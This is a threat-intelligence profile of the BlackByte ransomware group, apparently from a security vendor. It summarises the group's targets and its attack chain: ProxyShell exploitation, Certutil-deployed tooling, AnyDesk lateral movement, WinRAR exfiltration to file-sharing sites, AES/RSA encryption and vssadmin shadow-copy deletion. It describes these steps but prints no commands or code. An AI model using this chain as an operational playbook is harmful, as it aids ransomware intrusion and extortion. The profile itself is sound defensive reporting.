BlackByte | |
Date of Initial Activity | 2021 |
Suspected Attribution | Ransomware Group |
Targeted Countries | Peru |
Associated Tools | BlackByte Malware |
Motivation | Financial Gain |
Software | Windows |
Overview
Common targets
- Information
- Individuals
- Peru
- Chile
- Turkey
- India
- Netherlands
- United States
- United Kingdom
- Philippines
Attack Vectors
Phishing
Credential-based Attacks
Software Vulnerabilities
How they operate
The first step in a BlackByte attack typically involves gaining initial access to the victim’s network. The group has been known to exploit vulnerabilities, such as the ProxyShell flaw in Microsoft Exchange servers, which allows attackers to execute remote code and establish a foothold in the system. Alternatively, BlackByte uses phishing emails containing malicious payloads to trick users into executing the malware. Once the group gains access to the target environment, it deploys a custom tool called “Cobeacon” using the Windows tool Certutil, which enables further escalation and lateral movement.
Once BlackByte has established control over the victim’s system, the next step is discovery and lateral movement. Using tools like NetScan, the attackers conduct reconnaissance to understand the network topology and identify valuable targets. They then deploy AnyDesk, a legitimate remote access tool, to maintain control over the infected system and move laterally within the network. This technique allows BlackByte operators to deepen their access, reaching critical systems and increasing the likelihood of successful encryption. During this phase, BlackByte also terminates specific security processes to evade detection and hinder the effectiveness of endpoint protection.
Data exfiltration is a critical component of BlackByte’s operations, as the group seeks to steal sensitive information before deploying its ransomware. The malware uses WinRAR to archive important files and then uploads them to file-sharing sites such as anonymfiles[.]com or file[.]io. This step ensures that BlackByte operators have a copy of the stolen data, which can be used for double extortion — a tactic where the attacker threatens to leak the stolen data unless the ransom is paid. After the data has been exfiltrated, BlackByte proceeds to encrypt the victim’s files using a custom encryption mechanism.
The encryption process used by BlackByte is one of its defining features. Early versions of the ransomware employed symmetric AES encryption, which allowed researchers to develop a decryption tool. In response, BlackByte evolved its encryption strategy, implementing a more complex system that combines AES and RSA encryption. The ransomware generates an AES128 key, which is encrypted with an RSA key. This layered encryption ensures that files cannot be decrypted without access to the private RSA key, making recovery without paying the ransom nearly impossible. Additionally, BlackByte deletes system shadow copies using the “vssadmin” command, further complicating recovery efforts for victims.
Finally, BlackByte concludes the attack by leaving a ransom note demanding payment in cryptocurrency in exchange for the decryption key. The note also includes a warning not to use publicly available decryption tools, as they are ineffective against the newer versions of the ransomware. This commitment to innovation and its RaaS model has allowed BlackByte to maintain a significant presence in the ransomware landscape, with its operators continuously refining their tactics to stay ahead of security measures.
